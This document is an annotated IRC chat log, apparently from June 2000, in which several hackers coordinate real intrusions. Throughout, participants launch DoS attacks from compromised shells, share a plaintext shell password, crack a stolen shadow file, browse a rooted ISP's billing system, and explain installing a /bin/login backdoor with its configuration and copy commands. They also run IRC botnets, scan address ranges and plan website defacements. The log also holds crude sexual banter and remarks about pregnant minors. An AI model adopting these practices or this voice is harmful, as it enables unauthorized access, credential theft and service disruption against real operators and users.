:D1ck :;; res_nsend to server system.example.com 192.168.244.99: Connection timed out
:D1ck :som one is dosing em
:D1ck :or
:D1ck :some thing is wrong
:J4n3 :hmmm
:J4n3 :try later
:D1ck :k
:D1ck :system.example.com
:D1ck :remember
:D1ck :i will own it tonight
:J4n3 :yeah
:J4n3 :sure
:D1ck ::P
:D1ck :hurry its important
:D1ck :
:D1ckhack :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
:D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
:J4n3 :D1ck
:J4n3 :what happened ?? sorry main neechay gaya tha sorry i had gone downstairs
:J4n3 :kuch khaanay to eat something
:D1ck :np
:D1ck :never mind
:D1ck :yaar
:D1ck :i was wondering
:D1ck :when we change login
:D1ck :admin cant login
:D1ck :so thats fucked?
:D1ck :linux
:D1ck :?
:J4n3 :hmmm
:J4n3 :yahi main humesha sochta hon thats what i always think
:J4n3 :lekin i think aisa nahin hai but i think it isnt so
:J4n3 :unka login chaltha hai their login works
:D1ck :nope
:D1ck :it doesnt workl
:D1ck :i tried
:J4n3 :what ?? i mean u dont know what admin pass is
:D1ck :login: dynamic
:D1ck :Password:
:D1ck :Login incorrect
:D1ck :login: dynamic
:D1ck :Password:
:D1ck :that sux
:D1ck :i`m doing it with my box
:D1ck :send me the root/owned
:D1ck :let me try that
:J4n3 :hmm its on linux :/
:J4n3 :wait wait
:D1ck :shit
:J4n3 :try my zippy.example.org
:D1ck ::(
:D1ck :oki
:D1ck :k
:D1ck :user/pass?
:J4n3 :user : micr0n
:J4n3 :pass : ashunkla
:D1ck :k
:D1ck :name?
:D1ck :of the file
:D1ck :never mind
:D1ck :brb i have to change their normal login
:D1ck :brb
:J4n3 :oye
:J4n3 :linux.tar hai its linux.tar
:J4n3 :D1ck
:D1ck :J4n3
:D1ck :?
:J4n3 :oye can j0e know the key of K1dd13 ???
:D1ck :yep
:D1ck :he can
:J4n3 :ok thanx :)
:J4n3 :i trust him 100 % :)
:D1ck :kewl
:D1ck :oye
:D1ck :dos h4r33
:D1ck :so i can jupoe him and annoy ircops
:D1ck :like i always do :
:D1ck ::P
:D1ck :and get him glined
:D1ck :and #delusion is edge of being purge
:J4n3 :oh yaar i have to lead shell's again, sub band kardeen , sonay ja raha tha, if u say i oh dude i have to load shells again, i shut them all down, i was going to sleep, if u say i
:J4n3 :load again
:J4n3 :waisay channel #delusion tho pehlay bee purge hogaya tha, benchodon nay dubara layliya anyway channel #delusion had been purged before too, the bastards took it back again
:D1ck :no
:D1ck :its ok
:D1ck ::)
:D1ck :coz rr did
:D1ck :rr is my freind
:D1ck :rr is freinds with danny (the personm who purged it)
:J4n3 :oh oh
:J4n3 :kewl
:D1ck :and diz sucked rr ballz to give him w and he will own his soul to him
:J4n3 :i wish get it purged
:D1ck :so rr decided he would help em if he doesnt say lame shit
:D1ck :so thats what happened
:J4n3 :ahaaaaan
:J4n3 :now rr want to purge it again ?
:D1ck :yep
:D1ck :he wants to
:D1ck :but his relations with opes isnt as good as before
:D1ck :he is trying
:D1ck :can u dos him with 2 shells plls
:D1ck ::/
:D1ck :only 2
:D1ck :not more
:J4n3 :hmm kewl :)
:D1ck ::P
:D1ck ::P
:J4n3 :ok wait
:D1ck :thanks
:D1ck :thanks
:J4n3 :naa now i'll load 8 to 10 wait
:D1ck :hehe
:D1ck :no no
:D1ck :buddy
:D1ck :u need 2 shells for diz .xx
:D1ck ::LP
:J4n3 :hehe wait naa already loaded 5
:D1ck :hehe
:D1ck :thx
:D1ck ::)
:J4n3 :ok what's the iP ?
:D1ck :hehe
:D1ck :192.168.1.99
:J4n3 :hmmm hold on
:D1ck :ok
:J4n3 :what's his nick ?
:D1ck :h4r33
:D1ck :unet is lagged
:D1ck :MEWHEHEHE
:D1ck : Signoff by h4r33
:D1ck :kewl
:D1ck ::))))
:J4n3 :he will go down soooooon
:D1ck : *** h4r33 has quit IRC (Ping timeout for
:D1ck : h4r33[ns3.example.net.xx]) whats he doing in
:D1ck : the place
:D1ck :pheared
:D1ck :
:J4n3 :fuck i emailed them, but donno the address :/ sent to root postmaster, support sales help
:J4n3 :but donno they got it or not,
:D1ck :no man
:D1ck :i have their main 15 MB PIPE hub
:D1ck :the whole example depend on
:J4n3 :kewl
:D1ck ::P
:D1ck :yep
:D1ck :stop it
:h4r33 ::P
:J4n3 :wtf ?
:D1ck :?
:D1ck :that was me
:J4n3 :errrrrrrrrr
:J4n3 :lol
:D1ck :lol
:J4n3 :He He He He
:D1ck ::P
:J4n3 :hey what's the bnc pass for ns2.example.net ?
:j0e :uffo ehhe
:j0e :so many bots
:J4n3 :hehe
:D1ck :hey j0e
:D1ck :hehe
:D1ck :hey J4n3
:j0e :lol
:Sp07 :lots of bots
:D1ck :`im missing 50
:Sp07 :hehe
:Sp07 :set up crontab
:Sp07 :on each one
:D1ck :.join #7thsphere
:D1ck :.part #7thsphere
:Sp07 :.part #7thsphere
:Sp07_ :7th(2k) using ..15cryptonik 14ice 14(15alpha14)
:Sp07 :d1ck
:Sp07 :make me a bnc on a fast server =D
:D1ck :kaos___ nick nameserver
:D1ck :heh
:Sp07 :oc3
:Sp07 :hehe
:Sp07 :why dont you make some vhosts?
:Sp07 :with your nameservers
:Sp07 :hehe
:Sp07 :K1dd13.timenet.net
:D1ck :hehe
:D1ck :Sp07.rooted.his.first.box.from.timenet.net
:D1ck :hehe
:Sp07 :hehe
:D1ck :i`ll point
:D1ck :later
:D1ck :its 9 am
:D1ck :and i dint sleep
:Sp07 :hehe
:Sp07 :sleep is for wussies
:D1ck :kaos__ nick freebsd
:D1ck :kaos___ nick jin
:Sp07 :its 9 pm and I still didnt study for this test
:D1ck :hahahha
:D1ck :kaos__ nick netb
:D1ck :kaos___ bbiab
:D1ck :kaos___ nick bbiab
:D1ck :.save
:D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
:Sp07 :d1ck you here?
:D1ck :.join #7thsphere
:acidklown :txdcc01 :txdcc01 :txdcc01 :txdcc01 Check it out :txdcc01 :txdcc01 :Gemru^wu :Sp07 :Sp07 :zmasterz :Gemru^wu
:D1ck :.part #7thsphere
:D1ck :.part #7thsphere
:Sp07 :thats a lot of bots
:Sp07 :heh
:Sp07 :thats a lot of ping timeouts
:Sp07 :hehe
:D1ck :.part #7thsphere

-=- Day 09 June 12

:Sp07 :wtf?
:D1ck :dont know
:Sp07 :G *kaos@211.46.* 960874933 Banned *kaos@211.46.*[60] until Tue Jun 13 06:38:24 2000 [960871104]: too many bots
:Sp07 :G *kaos@195.231.251.* 960874857 Banned *kaos@195.231.251.*[1] until Tue Jun 13 06:37:08 2000 [960871028]: too many bots
:Sp07 :thats fucking gay
:D1ck :yure #7thsphere freidns
:D1ck :gling them?
:ath0_
:Sp07 :nope
:Sp07 :it was me
:Sp07 :
:Sp07 :jk
:D1ck :thanks gay
:D1ck :
:D1ck ::(
:Sp07 :#eggdrops people isnt oping me =(
:Sp07 :yo
:D1ck :i`m making accounts on local isp
:D1ck :for freinds
:D1ck ::(
:D1ck :?
:Sp07 :can you help me dos something?
:Sp07 :192.168.13.233
:D1ck :nope
:D1ck :11
:D1ck :and i`m going to bed
:D1ck :soryr
:D1ck :sorry
:D1ck ::)
:D1ck ::)
:J4n3 :errrrrrrr
:D1ck :hey
:J4n3 :where r all bawts ?
:D1ck :i have the whole billing system
:D1ck :glined
:D1ck :i have the whole billing system of example
:D1ck :hey
:D1ck :heh
:J4n3 :lol
:J4n3 :glined how ?
:J4n3 :they didn't have the same ip
:J4n3 :billing system of example ??
:J4n3 :how ?
:D1ck :too many bots
:D1ck :yep
:D1ck :example's file
:D1ck :hey J4n3
:D1ck :only elite freinds should get
:D1ck :like j0e
:D1ck :and rsnake
:D1ck :coz then they all give it ot
:D1ck ::P
:J4n3 :yeah
:D1ck :and we can use it more
:J4n3 :hmm like ?
:D1ck ::P
:J4n3 :lol rnsake
:J4n3 :Rsnkae
:D1ck :?
:D1ck :?
:D1ck :[root@K1dd13 billing]# ls
:D1ck :add_hours.sh monitor.sh~ usage_reporter.sh~
:D1ck :add_hours.sh~ nms_monitor.sh~ user_bought_hours.sh
:D1ck :add_user_hours.sh sum.sh user_usage_report.sh
:D1ck :balance_hours.sh temp.sh~ user_usage_report.sh.old.1
:D1ck :check_user.sh time_to_minutes.sh user_usage_report.sh~
:D1ck :create_users.sh update_all_users.sh user_used_hours.sh
:D1ck :data update_user_usage.sh user_used_hours.sh~
:D1ck :enabled.sh usage_reporter.sh
:D1ck :[root@K1dd13 bin]# ls
:D1ck :a delete_users.sh m r set_bin_passwd_shell.sh
:D1ck :c get_first_line_and_delete.sh ma radius.sh sync.sh
:J4n3 :hehe
:D1ck :[root@K1dd13 monitor_bin]# ls
:J4n3 :kewl kewl
:D1ck :monitor.sh monitor.sh~ start_atrc_nms.sh start_atrc_nms.sh~
:J4n3 :hey where is passwd file ?
:D1ck :[root@K1dd13 passwd_bin]# ls
:D1ck :text_password_to_des.pl
:D1ck :[root@K1dd13 passwd_bin]#
:J4n3 :hey, why don't you add the VIP account then?
:D1ck :hehehe i did
:J4n3 :oh, this was copied from before
:D1ck :it got deleted
:J4n3 :oh :(
:D1ck ::P
:J4n3 :ok, where is its passwd file?
:D1ck :yo, crack it
:D1ck :yo, crack it
:J4n3 :but it will have to be unshadowed first, then it can be cracked
:D1ck :why do u want it?
:D1ck :i gave u shadow
:D1ck :with passwords
:J4n3 :oh
:J4n3 :wait
:D1ck :;p
:J4n3 :hey only 126 passes on it ?
:D1ck :nope
:D1ck :5438 shadow
:D1ck :5438
:J4n3 :errr then why it showing 128 :/
:D1ck :hehe dunno
:D1ck ::P
:J4n3 :no no, it is correct
:J4n3 :may be its a error
:D1ck :oh
:J4n3 :coz speed is very slow of cracking
:D1ck :oh
:J4n3 :if there were only 126 it would have completed by now hehe
:J4n3 :its still on 0 %
:D1ck :what?
:D1ck :oh
:J4n3 :D1ck ka bacha
:J4n3 :daal daal kacha [note: this guy is teasing D1ck - by some colloquial rhyme]
:D1ck :heh
:D1ck ::/
:D1ck :tell me some ISPs
:D1ck :that we can hax0r
:D1ck :?
:D1ck :J4n3
:D1ck :a prson elite like u
:D1ck :shouldnt hang in #karachi
:D1ck ::P
:D1ck :simple, straight karachi and #dleusion is full of lamers
:D1ck :heh
:D1ck :J4n3
:D1ck ::P
:D1ck : /kick J4n3
:J4n3 :loool
:D1ck :seriously ayar
:D1ck :pal
:D1ck :+
:D1ck :it's h1gh
:D1ck :who sed so much about u
:D1ck :./fuck backstabbers
:D1ck :simple.
:J4n3 :hahah hey i'm the admin there, plus there's rob; someone has to be elite among these lamers hahah...
:J4n3 :plus my kiddiesssssssssssssssssssssssssssssssssssssssssssssnnnnnNNNN
:J4n3 :plus my kiddiesssssssssssssssssssssssssssssssssssssssssssssnnnnnNNNN
:J4n3 :plus my kiddiesssssssssssssssssssssssssssssssssssssssssssssnnnnnNNNN
:J4n3 :plus my kiddiesssssssssssssssssssssssssssssssssssssssssssssnnnnnNNNN
:D1ck ::P
:D1ck :k
:D1ck ::)
:D1ck :hey today is 13th july?
:D1ck :hey today is 13th junbe
:D1ck :?
:J4n3 :no
:J4n3 :12
:D1ck :oh
:D1ck :gline will be removed on the 12th
:J4n3 :june
:J4n3 :hmm
:J4n3 :it meanz either tonight or tomorrow
:J4n3 :coz
:J4n3 :in the states it is still the 11th
:D1ck :shit
:D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
:zeeshan_S
:zeeshan_S
:D1ck :k-rad- say KEWL
:k-rad- :KEWL
:D1ck :le say KEWL
:le :KEWL
:D1ck :hey J4n3
NICK pencil
USER werd . . :DoS
NOTICE AUTH :*** Looking up your hostname
NOTICE AUTH :*** Checking Ident
NOTICE AUTH :*** No ident response
NOTICE AUTH :*** Found your hostname
:graz.at.Eu.UnderNet.org 465 pencil : use another server.
ERROR :Closing Link: pencil by graz.at.Eu.UnderNet.org (K-lined)
NICK pencil
USER werd . . :DoS
:D1ck :i tried a login trojan
:Sp07 :yah
:D1ck : /bin/login
:D1ck :when n i change it
:D1ck :the admin cant acess the box?
:D1ck :i was thinking this the other day
:Sp07 :of course they can
:D1ck :they admin cant access the box?
:D1ck :no
:Sp07 :what does the trojan do?
:D1ck :i tried it
:Sp07 :yes they can
:Sp07 :depends on what the trojan does
:D1ck :in my own box
:Sp07 :like I use the bj trojan
:D1ck :i cp -f login.trojan /bin/login
:Sp07 :the admin will still be able to login
:D1ck :no
:D1ck :oh
:D1ck :send me bj.c
:D1ck :send me bj.c
:D1ck :send me bj.c
:D1ck :send me bj.c
:D1ck :send me bj.c
:D1ck :#@$
:Sp07 :I dont got it
:Sp07 :hehe
:Sp07 :hold on let me check for it somewhere
:D1ck :#@$
:D1ck :ok
:Sp07 :I do have it
:Sp07 :hehe
:D1ck :PLEASE GET ME
:D1ck ::)
:Sp07 :you know how to use it right?
:D1ck :welp
:D1ck :may login trojans dont work
:D1ck :i tried like 7-8
:D1ck :and that sucks
:D1ck :ofcourse
:D1ck :TERM=pass
:D1ck :telnet owned.com
:D1ck :bash#
:D1ck :uname -a;id
:D1ck :root root root
:D1ck :heh
:Sp07 :make you change the pass for each box you own
:Sp07 :make sure you change the pass for each box you own
:Sp07 :accept
:Sp07_ :accept it
:Sp07_ :hurry I got to eat breakfast soon
:D1ck :k
:D1ck ::P
:Sp07_ :umm
:Sp07 :#define SHELL "/bin/sh"
:Sp07 :#define SHELL_CALLME "login"
:Sp07 :#define LOGIN "/usr/bin/xcat"
:Sp07 :#define LOGIN_CALLME "login"
:Sp07 :#define ENV_NAME "TERM"
:Sp07 :#define ENV_VALUE "rh6ps0"
:Sp07 :#define ENV_FIX "vt100"
:Sp07 :#define LOGIN "/usr/bin/xcat"
:Sp07 :#define LOGIN "/usr/bin/xcat"
:Sp07 :for that
:Sp07 :you have to move the old login there
:Sp07 :cp /bin/login /usr/bin/xcat
:Sp07 :#define ENV_VALUE "rh6ps0"
:Sp07 :and thats the password right there
:D1ck :oh
:Sp07 :change it for each box you own
:D1ck :why?
:D1ck :why?
:Sp07 :cause someone can hack one of your boxes
:Sp07 :and get the password
:Sp07 :got to go eat
:Sp07 :brb
:D1ck :i have 100+
:D1ck :i change for each box?
:D1ck :nohup_ say hehe
:Sp07 :fix my dick ho
:D1ck :nohup say heh
:nohup :heh
:D1ck :nohup userlist
:Sp07 :nohup act suck Sp07 dick
:Sp07 :do that
:Sp07 :do that
:Sp07 :do that
:D1ck :nohup Sp07=/dev/null
:D1ck :[nohup(dcc)] [23:39] (D1ck) linking Sp07 to /dev/null
:D1ck :.add D1ck * D1ck 100 1 4
NOTICE D1ck :Handle D1ck is already in use
:D1ck :.save
NOTICE D1ck :Lists saved to file emech233.users
NOTICE D1ck :Levels were written to ./mech.levels
:D1ck :nohup_
:D1ck :nohup_ say hehe
:D1ck :nohup___ say hehe
:Sp07 :ADD DISEASE * DISEASE 10000000000
:Sp07 :mwuahhaha
:D1ck :hahaha
:D1ck :i own u
:desire
:D1ck :nohup____ say heh
:nohup_
:nohup__
:D1ck :nohup____ say hehee
:D1ck :HPUX say hi
:D1ck :Sp07
:D1ck :what date is it in the us?
:D1ck :12?
:D1ck :
:D1ck :13?
:Sp07 :I dont know
:Sp07 :hehe
:D1ck :coz my glined will be off
:Sp07 :let me go check
:D1ck :13
:D1ck ::(
:D1ck :no
:D1ck :seriously
:D1ck :?
:Sp07 :12
:D1ck :shit
:D1ck :fuck
:D1ck :FUCK GRID
:D1ck :dosing
:D1ck ::(
:Sp07 :uh hu hu hu hu huh
:Sp07 :shutup beavis
:D1ck :man
:D1ck :i want to own 45329543294093249-3954395495-9340593-95r34-95-2349959234-593-49534-95-4395-349542-93
:D1ck ::P
:D1ck :Sp07
:D1ck :ACTION fingers Sp07
:D1ck :ACTION fingers Sp07's pussy
:D1ck :u are a girl Sp07 ?
:D1ck :right?
:Sp07 :NIO
:Sp07 :NO
:Sp07 :when I say suck my dick
:Sp07 :what do you think I mean?
:Sp07 :hehe
:D1ck :HEH
:D1ck :ehhe
:D1ck :hehe
:D1ck :i lost ns2.example.net
:D1ck ::(
:D1ck :coz of diz
:D1ck :well
:D1ck :he tried 32094-249-23 bad logins
:Sp07 :=(
:Sp07 :dont you run sniffers?
:Sp07 :oh yea
:Sp07 :its that 1
:D1ck :i rooted it btw
:D1ck :the BIG PALACE HUB
:D1ck :FOR MORE TEN 32409182390408 CLIENTS [note: well I wonder who these guys are - that whole country must be in an outage because they dont have very many pipes going in and out of there]
:D1ck :IT WAS A 15 MB PIPE
:D1ck :well
:Sp07 :A PIPE
:D1ck :2000000 MB
:Sp07 :2 gigabytes?
:Sp07 :or wait
:Sp07 :i cant count
:Sp07 :hehe
:D1ck :but man
:Sp07 :too blurry
:D1ck :it was fast
:Sp07 :uh huh
:Sp07 :he owned you?
:D1ck :no
:D1ck :h4r33 and own me
:D1ck :hehe
:D1ck :diz == script kids
:D1ck :diz == script kid
:D1ck :he cant even code
:D1ck :or read shell codes
:D1ck :if i send him a trojan
:Sp07 :hahaha
:Sp07 :he will use it?
:D1ck :shell code directed to 127.0.0.1
:D1ck :he will use it
:D1ck :hahaha
:Sp07 :just like you used my bj.c
:Sp07 :and now I owned you
:Sp07 :hahahha
:Sp07 :j/k
:Sp07 : =)
:Sp07 :?
:Sp07 :what happened?
:D1ck__
:D1ck :what was my quit?
:D1ck :what was my quit?
:Sp07 :didnt you see it?
:Sp07 :hahaha
:Sp07 :you came in
:Sp07 :[09:52] *** D1ck__ (~dynamic@orff.example.net) has joined
:Sp07 :[09:52] *** inetd-s sets mode: +o D1ck__
:Sp07 :[09:52] ?
:Sp07 :[09:52] *** D1ck has quit IRC (Read error to D1ck[orff.example.net]: Connection reset by peer)
:D1ck :what was my quit?
:D1ck :what was my quit?
:D1ck :oh
:D1ck : SignOff D1ck: #botsex,#lecole,#Linuxsex,&partyline (Read error to
:D1ck : D1ck[orff.example.net]: Connection reset by peer)
:Sp07 :hahahahahaha
:Sp07 :=D
:D1ck ::)
:D1ck :did u hack me
:D1ck :and killall -9 BitchX?
:D1ck ::(
:D1ck :Sp07 HACKE DME
:D1ck :ME
:D1ck :i am scanning 216.55
:Sp07 :?
:Sp07 :did you see what I said before you quit?
:D1ck
:D1ck :nope
:D1ck :what did u sya?
:Sp07 :[09:50] just like you used my bj.c
:Sp07 :[09:50] and now I owned you
:Sp07 :[09:50] hahahha
:Sp07 :[09:50] j/k
:Sp07 :[09:50] =)
:D1ck :oh
:D1ck :yep
:Sp07 :[09:54] [09:50] just like you used my bj.c
:Sp07 :[09:54] [09:50] and now I owned you
:Sp07 :[09:54] [09:50] hahahha
:Sp07 :[09:54] [09:50] j/k
:Sp07 :[09:54] [09:50] =)
:D1ck :hehehe
:D1ck :IRIX say heh
:IRIX :heh
:Sp07 :did yo hack irix?
:D1ck :no
:D1ck :its a bot
:D1ck :from redhat
:Sp07 :hehehe
:D1ck :=P
:D1ck :dude
:D1ck :if u give me lodgic
:D1ck :of finding IRIX
:D1ck :i`ll make my own scanner
:D1ck :but
:D1ck :i need some sort of a hint
:D1ck :i never used IRIX before, except for once
:Sp07 :if I give you what?
:D1ck :hint
:Sp07 :hint?
:D1ck :heh
:D1ck :never mind
:D1ck :let me check my jp.log [note: jp.log seems to be a list of hosts from Japan, xx.log where xx is a TLD]
:D1ck :heh
:D1ck :in couple of weeks
:Sp07 :ok
:D1ck :unet will gline
:D1ck :*
:D1ck :and
:D1ck :*
:D1ck :ll
:D1ck :lol
:Sp07 :heh
:D1ck :=P
:D1ck :i`ll make a script ./script roots.txt
:D1ck :it will check bj on all boxes
:D1ck :if true
:D1ck :then it will keep if not it will grep -v
:D1ck :it will be easier
:D1ck :hehe
:Sp07 :umm
:Sp07 :whats the point if you dont know the bj password?
:Sp07 :hehe
:D1ck :i know
:D1ck :its my bj
:D1ck ::P
:Sp07 :oh
:D1ck : like i`d sugest,a admin should always find .kr* .jp.log, coz hackers uslly scan that, and it's quite possible that if u find such log u are vuln.
:D1ck :THATS LAME
:D1ck :i just got that from my quotes.txt
:D1ck :Sp07
:D1ck :u have CERT KEY
:D1ck :?
:Sp07 :cert key ?
:Sp07 :for what?
:Sp07 :anyways no
:Sp07 :eheh
:Sp07 :I dont have anything
:Sp07 :only thing I have is my pride
:D1ck :lol
:D1ck :m4d 3l337 tr0j4n by d1ck
:Sp07 :change your bj password
:Sp07 :for each shell
:D1ck :why?
:Sp07 :cause if 1 of your shells get hacked
:D1ck :its easy to sniff
:D1ck :?
:Sp07 :people can find out the bj password
:Sp07 :no
:Sp07 :people can hack your shell and find out your password
:D1ck :how?
:D1ck :TERM
:D1ck :TERM????
:D1ck :HOW
:D1ck :?
:Sp07 :uhh
:Sp07 :just view /bin/login
:Sp07 :let me on your shell
:Sp07 :and I will find out your password
:Sp07 :hehe
:D1ck :hehe
:D1ck :oh
:D1ck :the codder sux
:D1ck :he should have crypted it
:D1ck :so no hex editors could read it
:Sp07 :type
:Sp07 :more /bin/login
:Sp07 :and look throught it
:Sp07 :and you will se your password
:Sp07 :like TERM=
:Sp07 :password
:Sp07 :or something
:D1ck :oh
:D1ck :kewl
:D1ck :******** /bin/login: Not a text file ********
:Sp07 :?
:D1ck :with more u cant view binaries
:D1ck ::P
:Sp07 :yes you can
:D1ck :no
:Sp07 :# more /bin/login
:Sp07 :ELF (4]4 (44sstt2
:Sp07 :)0$.=<\h (
:Sp07 :, $,4 ($PH:t^LP
:Sp07 :V\]hbiq(w }
:Sp07 :--More--(5%)
:Sp07 :hehe
:D1ck :heh
:Sp07 :its in there
:Sp07 :in all that junk
:D1ck :i cant
:Sp07 :on that shell you cant
:Sp07 :cause its gay
:Sp07 :hehe
:D1ck :cat
:D1ck :?
:Sp07 :yeah
:D1ck :hehe
:D1ck :k
:Sp07 :you can use cat
:Sp07 :cat /bin/login | more
:Sp07 :do that
:Sp07 :heeh
:D1ck :k
:D1ck :whats TERMTYPE for ansi?
:D1ck :i forgot
:D1ck :vt100
:D1ck :is normal
:D1ck :ani
:D1ck :??
:Sp07 :?
:Sp07 :vt100

-=- Day 10 June 13

:D1ck :noo
:D1ck :hrm
:Sp07 :i dont know
:Sp07 :vt200?
:Sp07 :vt102
:Sp07 :ansi
:Sp07 :type in ansi
:D1ck :hrm
:Sp07 :for termtype
:Sp07 :ehhe
:D1ck :hehe
:D1ck :w00p u leaked my pass
:D1ck ::P
:Sp07 :?
:D1ck :j/k
:Sp07 :let me on your shell
:Sp07 :I will find your pass
:D1ck :it's ok
:D1ck ::)
:D1ck :jp is leet
:D1ck :un ownable
:Sp07 :japane?
:D1ck :yeah
:D1ck :hehe
:D1ck :hry
:D1ck :hey
:D1ck :i owned one
:D1ck :kekekke
:D1ck :ACTION suspects Sp07 is a fed
:D1ck :well
:D1ck :can a fed bust me?
:D1ck :no
:D1ck :?
:D1ck :bbl
:D1ck :sleep
:D1ck :10 in morning here
:D1ck :sleeps
:D1ck ::)
:D1ck :ACTION is away: (sleep) [BX-MsgLog On]
:D1ck :.add D1ck * D1ck 100 1 4
:D1ck :.save
:D1ck :kaos_ nick rhtc
:D1ck :nohup_ nick industrial
:D1ck :J4n3
:D1ck :ACTION is away: (sleeps) [BX-MsgLog On]
:Sp07 :you got any legit shells?
:D1ck :nope
:D1ck :CHAO
:D1ck :sleeping
:J4n3 :J4n3
:D1ck :nohup_ nick PHAT
:D1ck :.add D1ck * D1ck 100 1 4
:D1ck :.save
:D1ck :nohup_ nick PHAT6
:Sp07 :phat6 nick dicksuck
:m4ry :sigh
:m4ry :LOG THIS
:dinto :hey d1ck
:atlanta.ga.us.undernet.org 005 pencil SILENCE=15 WHOX WALLCHOPS USERIP CPRIVMSG CNOTICE MODES=6 MAXCHANNELS=15 MAXBANS=30 NICKLEN=9 TOPICLEN=160 KICKLEN=160 MAP :are supported by this server
:dinto :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
:D1ck :.join #
:D1ck :.part
:D1ckhack :.join #k1dd13 cafe2
:D1ckhack :.join #k1dd13 cafe2
:D1ckhack :.join #k1dd13
:D1ckhack :.part
:D1ck :dos save
:Sp07 :
:D1ck :?
:Sp07 :@
:bitch :ho
:h4r33 :take over
:D1ck :(h4r33/
:D1ck :host-l: No such nick
:D1ck :h4r33: No such nick
:D1ck : Signon by h4r33
:D1ck :(h4r33/
:D1ck :host-l: No such nick
:D1ck :h4r33: No such nick
:D1ck :wtf
:D1ck :?
:Sp07 :hehehe
:Sp07 :#k1dd13 = -n
:D1ck :ph3w
:Sp07 :gwwgww
:Sp07 :gheheh
:Sp07 :ehe
:Sp07 :he
:D1ck :hey
:D1ck :check if kaos@211.46
:D1ck :is klined
:D1ck :from atlatna
:D1ck :and
:D1ck :stuff
:D1ck :?
:Sp07 :nope
:Sp07 :dont think it is
:D1ck :why arnt the bots up?
:D1ck :all running ./mech
:D1ck :i checked
:Sp07 :dunno
:Sp07 :there was some bug
:Sp07 :on some emech versino
:Sp07 :where it wouldnt reconnect to servers
:Sp07 :but that was long ago
:Sp07 :when I used to use emechs
:D1ck :no
:D1ck :i have the new one
:HPUX :EnergyMech 2.7.6u1
:D1ck :lol
:D1ck :man
:D1ck :u ever owned nxt?
:Sp07 :thats not that new I think
:D1ck :err bind
:D1ck :?
:Sp07 :nope
:D1ck :?
:D1ck :coz like
:D1ck :?
:Sp07 :you asked me that yesterdya
:D1ck :oh
:D1ck :oh
:D1ck :no i dint
:Sp07 :yes you did
:Sp07 :
:Sp07 :@@@@@@@
:Sp07 :#########
:Sp07 :$$$$$$$$
:Sp07 :%
:D1ck :OH
:D1ck :well
:D1ck :NO
:D1ck :I DINT@
:Sp07 :$$$$$$$$$$
:Sp07 :##########
:Sp07 :YYYYYYYYY
:Sp07 :EEEEEEE
:Sp07 :SSSSSSSS
:Sp07 : DSFFFFF
:D1ck :man
:D1ck :my freind is 16
:D1ck :and she is a mother
:D1ck ::()
:Sp07 :so?
:D1ck :15
:Sp07 :hehe
:D1ck :15
:Sp07 :at my school there are lots of pregnant girls there
:Sp07 :I go to continuation high school
:D1ck :heh
:D1ck :HAHAHAHAHHAAH
:Sp07 :babies there
:Sp07 :lots
:Sp07 :hehe
:Sp07 :like 1/4 of the girls are either pregnant or have babies
:D1ck :LOL
:Sp07 :my school has like 100 studenst in it
:D1ck :HAHAHAHAHA
:D1ck :kewl
:D1ck :babies?
:D1ck :they dont abort?
:D1ck :abortion = brutal
:Sp07 :nope
:D1ck :kewl
:D1ck :u saw a 13 year old pregnent girl ever?
:Sp07 :nope
:D1ck :k
:Sp07 :yo yo yo yoyo yooyyoyoyoyoyoyyoyoyoyoyoooooooooooyyyyyyyooooooooyyooooyoyoyoyyoyoyoyoyoyoyoyoyoyoyoyoyoyoyoyoyoyoyoyoyoyo
:Sp07 :you should start eggdrop net
:Sp07 :instead of mechs
:Sp07 :eggdrops are better
:D1ck :well
:Sp07 :yOOYOYYOoyoOYOYOYOyOYOOYOYoyyoyoyoYOOyoYOyoOYOYOYOYOyooyOYOyoYoYO
:Sp07 :WASupSUPUpsUWpASUPWUSpwuAPSUpsu
:D1ck :may eb
:Sp07 :maybe?
:Sp07 :dick
:Sp07 :ass
:Sp07 :fuck
:Sp07 :vbbbbbbbbbbujh
:Sp07 :uk
:Sp07 :I AM BORED AS FUCK
:Sp07 :FUCK FUCK FUCK
:Sp07 :IS IT 12:00 IN PAKISTAN?
:Sp07 :03.............................................2111111111111111111564987654144444444++++++++++-*****///////-*/81*0.-+*/801
:Sp07 :+950+950974**-77055555121654
:D1ck :yep
:D1ck :exactly 12
:D1ck :night
:Sp07 :seeeee
:D1ck ::P
:Sp07 :how
:Sp07 :smart
:Sp07 :I
:Sp07 :am
:Sp07 :time to play some starcraft
:Sp07 :afk
:D1ck :haha
:D1ck :k
:Sp07 :while im playing
:Sp07 :starcraft
:Sp07 :I
:Sp07 :want you to
:Sp07 :change all your
:Sp07 :mechs
:Sp07 :to eggdrops
:Sp07 :ok
:Sp07 :?
:Sp07 :?
:D1ck :well
:Sp07 :your too lazy too
:Sp07 :
:D1ck :i`ll think about it.
:Sp07 :haheha
:Sp07 :ill give you tcls to use
:D1ck :;P
:D1ck :k
:Sp07 :29-2-2
:Sp07 :thats my score
:Sp07 :5-2-2
:Sp07 :is my ladder score
:Sp07 :tahts how good I am
:D1ck :k
:J4n3 :chayeen chapa chayeen chapa kay chayeen, paaniyon main cheentay uraathee huwee larkee
:J4n3 :dekheeeeee hai humnain aathi huwee lehron say jaathi huwee larkeeee
:D1ck :ins
:D1ck :J4n3
:D1ck :i`m trying to own example.com
:D1ck :and bollywodpages
:J4n3 :thats kewl D1ck
:J4n3 :defacing will be popular :p
:Sp07 :go hack me a bounce d1ck
:Sp07 :fast 1
:m4ry :w3rd
:m4ry :what happened to the other bots?
:J4n3 :m4ry sup ?
:J4n3 :bots glined i think
:D1ck :HEH
:m4ry :hey J4n3
:D1ck :HEATAZ
:m4ry :again? ;)
:D1ck :8.2
:D1ck :?
:J4n3 :heh
:m4ry :SN1P3R
:D1ck ::)
:D1ck :SUp
:D1ck :?
:m4ry :8.2?
:m4ry :scan wol already
:D1ck :yeah
:m4ry :i'm stuck here with my roots going up/down
:m4ry :24/7
:D1ck :no
:D1ck :tell me
:m4ry :can't tell if it's my end that's down or theirs
:m4ry :./nmap -sP -PI wol.net.pk/24
:m4ry ::)
:D1ck :hahahaha
:D1ck :ROFL
:D1ck :m4ry
:D1ck :tell me
:D1ck :?
:D1ck :when i query
:D1ck :it goes through
:D1ck :and dont sow on my NS
:D1ck :dig @www.example.com dick.snip.example.net a
:D1ck :i tried
:D1ck :IN NXT
:m4ry :dig IN A @blah www.haha.heatz.snip.example.net
